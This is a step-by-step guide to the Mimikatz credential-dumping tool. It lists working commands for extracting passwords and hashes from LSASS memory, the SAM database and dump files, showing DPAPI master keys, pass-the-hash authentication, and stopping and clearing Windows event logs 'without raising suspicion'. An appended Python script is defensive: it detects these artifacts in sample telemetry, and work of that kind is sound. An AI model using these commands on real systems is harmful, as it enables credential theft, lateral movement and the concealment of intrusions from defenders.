Basic Guide to Mimikatz

Opening and Running

To get started, open CMD as an Administrator (right-click, Run as administrator) and launch Mimikatz from that prompt. Without an elevated prompt, Mimikatz cannot obtain the privileges it needs, such as running as NT AUTHORITY\SYSTEM.

Checking Privileges

To check whether you have elevated privileges (the command requests the debug privilege for the Mimikatz process), use the following command:

privilege::debug

If you don't have the necessary privileges, the command prints an error instead of confirming the privilege:

privilege::debug
ERROR (not running as Administrator)

Elevating Privileges

To elevate your privileges by impersonating an available SYSTEM token, use:

token::elevate

Saving Output to a File

If you'd like to save all of Mimikatz's output to a text file, use the following command:

log C:\fool.txt

Extracting Passwords and Hashes from RAM

To extract passwords and hashes cached in memory by the lsass.exe process (LSASS), use this command:

sekurlsa::logonpasswords

Extracting Information from the SAM

To extract the local users and their hashes from the SAM database, use this command:

lsadump::sam

Working with External Dump Files

To load an external dump file and work on it, use the following command:

sekurlsa::minidump "C:\Users\username\full_dump_file.dmp"

Then you can extract passwords from the loaded dump the same way:

sekurlsa::logonpasswords

Clearing Logs Without Raising Suspicion

To stop new event log entries from being written and then clear the existing logs, use the following commands. Note that clearing the Security log itself records Event ID 1102 (audit log cleared), which monitoring teams commonly alert on:

event::drop
event::clear

Cracking Hashes

If you have a hash, you can submit it to the following site, which looks it up against precomputed tables:

https://crackstation.net

Working with DPAPI

To display the DPAPI master keys that LSASS has cached on the system, use the following command:

sekurlsa::dpapi

Pass-the-Hash

To authenticate with an NTLM hash instead of a password (pass-the-hash), first elevate, then run:

token::elevate
sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:NTLMHASH
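
As an added example from the defender's side (not part of the original guide), the following Python scans a few constructed host-telemetry records for the artifacts that the LSASS access, log-clearing and pass-the-hash steps above leave behind. The flat dict layout, the allowlist of legitimate LSASS readers and the LogonType 9 / seclogo pattern are assumptions modelled on Sysmon Event ID 10 and Security Event IDs 1102 and 4624.

```python
# Added example, not from the original guide: flag telemetry records that
# match the artifacts left by LSASS credential dumping, event log clearing
# and pass-the-hash logons. Records are a simplified, constructed form of
# Sysmon (Event ID 10) and Security (Event IDs 1102 and 4624) events.
PROCESS_VM_READ = 0x0010  # access right required to read LSASS memory
TRUSTED_LSASS_READERS = {  # assumed allowlist of processes that legitimately open LSASS
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

def check_event(ev):
    """Return a finding string for a suspicious record, or None."""
    chan, eid = ev.get("Channel"), ev.get("EventID")
    if chan == "Sysmon" and eid == 10:
        target = ev.get("TargetImage", "").lower()
        source = ev.get("SourceImage", "").lower()
        granted = int(ev.get("GrantedAccess", "0x0"), 16)
        if (target.endswith(r"\lsass.exe") and granted & PROCESS_VM_READ
                and source not in TRUSTED_LSASS_READERS):
            return f"LSASS memory read by {ev['SourceImage']} (GrantedAccess {ev['GrantedAccess']})"
    if chan == "Security" and eid == 1102:
        return f"Security log cleared by {ev.get('SubjectUserName')}"
    if (chan == "Security" and eid == 4624 and ev.get("LogonType") == 9
            and ev.get("LogonProcessName") == "seclogo"):
        return f"NewCredentials logon via seclogo for {ev.get('TargetUserName')} (pass-the-hash pattern)"
    return None

def scan(events):
    """Run check_event over every record and keep only the findings."""
    return [f for f in (check_event(e) for e in events) if f]

SAMPLE_EVENTS = [  # constructed sample telemetry, not real captures
    {"Channel": "Sysmon", "EventID": 10, "SourceImage": r"C:\Users\alice\Desktop\mimikatz.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"Channel": "Sysmon", "EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"Channel": "Security", "EventID": 1102, "SubjectUserName": "alice"},
    {"Channel": "Security", "EventID": 4624, "LogonType": 9, "LogonProcessName": "seclogo",
     "TargetUserName": "svc_backup"},
    {"Channel": "Security", "EventID": 4624, "LogonType": 2, "LogonProcessName": "User32",
     "TargetUserName": "alice"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print("ALERT:", finding)
```

The allowlisted csrss.exe access and the ordinary interactive logon produce no finding, so only the three records matching the guide's techniques are reported.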

Summary

In this guide, we covered how to run Mimikatz with the required privileges, log its output to a file, extract credentials from LSASS memory, the SAM database and minidump files, clear event logs, display DPAPI master keys, and authenticate with an NTLM hash.
